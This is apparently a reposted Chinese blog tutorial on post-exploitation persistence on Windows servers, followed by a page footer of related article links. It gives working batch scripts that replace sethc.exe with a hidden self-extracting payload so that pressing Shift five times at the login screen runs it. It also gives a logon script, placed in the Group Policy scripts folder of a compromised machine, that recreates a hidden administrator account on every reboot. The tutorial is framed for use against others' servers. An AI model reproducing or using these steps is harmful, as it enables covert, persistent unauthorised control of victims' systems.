后渗透篇:sethc后门制作和超级帐户的建立(补充节点1)

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量643 收藏
点赞数
原文链接:https://blog.csdn.net/God_XiangYu/article/details/100009545
版权

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

sethc后门制作和超级帐户的建立(补充节点1)

0x01 介绍     

0x02 操作演示

 

sethc后门制作和超级帐户的建立(补充节点1)

0x01 介绍     

 

      前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking

什么是sethc后门,或者也可以叫Shift后门?

答:

      windows登陆界面的时候连按5次shift就会调出系统的放大镜,shift后门就是替换这个放大镜程序,在登陆界面按5次shift时运行一个木马程序,来新建一个用户,这样就可以登录了,在注销之前在删除这个用户,这样这台电脑的用户不会发现自己的电脑出现问题。

 

0x02 操作演示

1. 我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
2. 再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
3. 将win.rar做成自解压格式:
      添加新的自解压→Default.SFX 图形界面 RAR自解压模块→高级自解压选项→解压后运行(添加: cmd.exe 也有用SystemRoot\explorer.exe的)→模式→选择:全部隐藏覆盖所有文件→确定
4. 然后我们再建立一个批处理文件RU.BAT,用来将win.exe(win.rar做成自解压后生成的文件)替换到system32下.

      主要实现目的为执行:


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     copy win.exe C:\WINDOWS\system32\sethc.exe /y
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe /y
    
    
    
   
   

 
 
  这是一位网友写的批处理RU.BAT,可以借鉴.都是满简单的.

 
 

 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     @echo off
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       cls
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       copy win.exe C:\WINDOWS\system32\sethc.exe
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       attrib C:\WINDOWS\system32\sethc.exe sethc.exe
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       attrib C:\WINDOWS\system32\dllcache\sethc.exe h
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       echo
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       cls
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       echo.
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       
     
     del win.exe
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       
     
     del 
     
     0
    
    
    
   
   

 
 

 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     5. 将
     
     RU
     
     .BATWIN
     
     .EXE传到肉鸡上并运行
     
     RU
     
     .BAT就完成了
     
     shift后门的安装.
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       关于不死帐号的方法常见的几种中我们今天简单的介绍一种依靠特殊路径开机自动执行
     
     BAT命令添加管理帐户的方法.很简单,一看就明白了,这里我也不多做解释了:
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       制作批处理文件
     
     ad
     
     .bat ,代码内容为:
    
    
    
   
   

 
 

 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     @echo off
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       cls
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       net user amxking /
     
     del
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
       net user amxking !@
     
     #$^&*(000 /add

注释:

      前面amxking是用户名后面!@#$^&*(000 是密码,如此设置一是安全目的,二是方便通过具有密码策略的效验,注意不要超过14位,否则有些老版本系统不支持;
  net localgroup administrators amxking /add
  将ad.bat上传到肉鸡上,路径为:

C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon

      这样只要肉鸡服务器重起就会执行ad.bat将我们的帐户添加并提权为管理帐户.也就实现了所谓的不死帐号.
   注意: 路径在具体过程中需要自己修改,别抱着C:\WINDOWS就不变,脑袋要灵活点,哪里是SystemRoot 就改成哪里.^_^
   PS:按5次shift键后门.exe 工具如果再加些功能比如设置密码,那就不用这么麻烦了......

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

bylfsj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
粘滞键利用总结
prettyX的博客
04-24 3424
粘滞键 Windows系统下,启用粘滞键的键盘快捷方式是按5次Shift键 方法一 将sethc.exe(粘滞键程序)替换成cmd.exe,这样在目标机登录页面连续按5下shift可调出cmd命令行 sethc路径:c:\windows\system32 这里有一个权限的问题需要注意,在Windows Vista版本之后的系统,当修改sethc.exe程序名字或将该程序剪切走时,会需要TrustedInstaller权限 TrustedInstaller权限,要高于Administrat
学习笔记--破解系统密码
juzikai的博客
05-19 362
如何破解部分win7和win10系统计算机的账户密码
渗透利用sethc留下后门
whoim_i的博客
02-19 7164
目录说在前面什么是sethc?怎么利用?关于sethc的权限 说在前面 大家在平常使用电脑办公的时候,手不小心按到了键盘上的某个键,电脑上就会弹出一个框框,叫作是否启用粘滞键,这很影响我们的操作。然而这个东西却存在着巨大的漏洞。 什么是sethc?怎么利用? sethc就是windows中的粘滞键。他的启用方式是按5下shift键,windows就会去找c:\windows\system32\下面...
windows sethc漏洞 5次shift获取系统权限
weixin_46128614的博客
03-22 994
漏洞成因 在未登陆的情况下,可以按下五次shift键启动 sethc程序,同时系统可以在未登录的情况下用system权限打开一个记事本,用记事本打开文件夹,可以将sethc程序换成cmd,进而获取了system权限 复现过程 在win7的启动过程中断电 再次启动进入恢复界面 选择修复 在结果的中可以打开一个记事本 用记事本打开 C:\windows\system找到sethc重命名,然后把...
win7忘记密码,启动恢复
qq_43180941的博客
08-30 1793
win7忘记密码,启动恢复 第1步 调出BIOS系统(一般是气动系统是长按F8),选择启动启动恢复 第2步 点击取消 第3步 点击 查看问题详细信息 第4步 点击 下方这个红框圈起来的连接地址 第5步 第4步点击后会弹出一个选择文件的框,打开C盘,Windows,System32,找到sethc这个文件 1.把这个sethc改个名字,比如sethc-123 2.把sethc改名之后,再找到cmd, 复制粘贴一份(cmd和sethc同文件夹) 3.把你粘贴的“cmd - 副本”重命名为sethc
超强SETHC后门超强SETHC后门超强SETHC后门
08-13
超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强...
sethc_vb.rar_VB后门_sethc_服务器后门_远程桌面
09-23
1. **VB后门编程**:VB语言的灵活性和易用性使得它成为编写后门程序的常见选择。攻击者可以通过编写VB脚本来实现各种恶意功能,如文件上传、下载、执行命令等。 2. **sethc利用**:sethc.exe是Windows系统中的一个...
后门sethc 带输入密码的 后门sethc
01-09
后门程序,通常被称为...总的来说,了解"sethc"后门的工作原理和防范措施,对于保护个人和组织的网络安全至关重要。定期维护和更新系统,保持警惕,并采取必要的安全防护策略,可以显著降低被此类后门攻击的风险。
sethc提权专用后门
05-10
在IT安全领域,"sethc提权专用后门"是一个重要的知识点,主要涉及到Windows操作系统中的权限提升(Privilege Escalation)技术。Sethc.exe是一个合法存在的系统组件,主要用于在启动过程中提供辅助功能键盘快捷方式...
sethc.exe新的镜像劫持技术和安全防御!(shift后门).docx
10-30
Shift后门的触发机制在于,Windows系统默认情况下,连续按下五次Shift键会启动Sticky Keys功能,而被劫持后的sethc.exe则会绕过这一功能,直接执行攻击者的命令。由于这种攻击方式通常不需要管理员权限,因此对于不...
大牛后门 密码
05-06
后门密码 收集
sethc加强版
05-16
sethc加强版,更多功能请下载自己测试,没有后门
sethc.exe用于被黑的服务器的恢复
04-17
用于被黑的服务器的恢复,替换掉被黑的sethc.exe用于被黑的服务器的恢复
怎么样把cmd程序替换sethc程序
08-08
很有用的,我觉得.将系统中的辅助工具“sethc.exe”。替换成为“explerer.exe”,这样就可以在3389或本地登录界面中打开粘滞键开关了。
粘滞键后门详述
发哥微课堂
03-07 8679
0x00:介绍 首先介绍一下粘滞键,粘滞键很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕竟这个功能一般我们都用不到,粘滞键是为了那些按钮有困难的人设计的,也可理解为残疾,就是按键困难,一次只能按一个键的这种需求,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么...
Windows粘滞键后门
最新发布
carmi的博客
03-14 761
此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
sethc后门
一个码农的笔记
02-14 2487
一般清除电脑密码办法就是利用PE等工具,如果没有任何工具的情况下该怎么办? 现在说一个办法,不借助任何工具,实现添加系统用户或者修改密码等操作。 开机后按F8,选择正常启动Windows,然后强制关机或者断电。 接着在继续启动电脑,会提示让你修复,选择启动修复(推荐)。 启动修复一两分钟后,会弹出一个对话框,然后点击箭头查看详细信息。 点击txt文本链接,然后点击文件->打开
一个Shift的后门程序,可以让你可以进入你不知道密码的电脑
热门推荐
杨启盛的博客
08-01 2万+
1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\system32\setchx.exe 3.Shift后门程序编写 将下面的内容保存成.bat后缀的文件,文件名你可以自己取,取的吸引人一点,他们就会点了,你懂的! 为了让别人不知道你这个程
xpsql.cpp错误5提权策略:MySQL UDF与Shift后门
他们尝试创建一个临时的Shift快捷方式,通过SQL的sp_oacreate和sp_oamethod函数来调用Explorer.exe和sethc.exe(用于启动管理员命令提示符)来实现提权。尽管进程创建了,但没有弹出Explorer界面,表明这个方法未能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值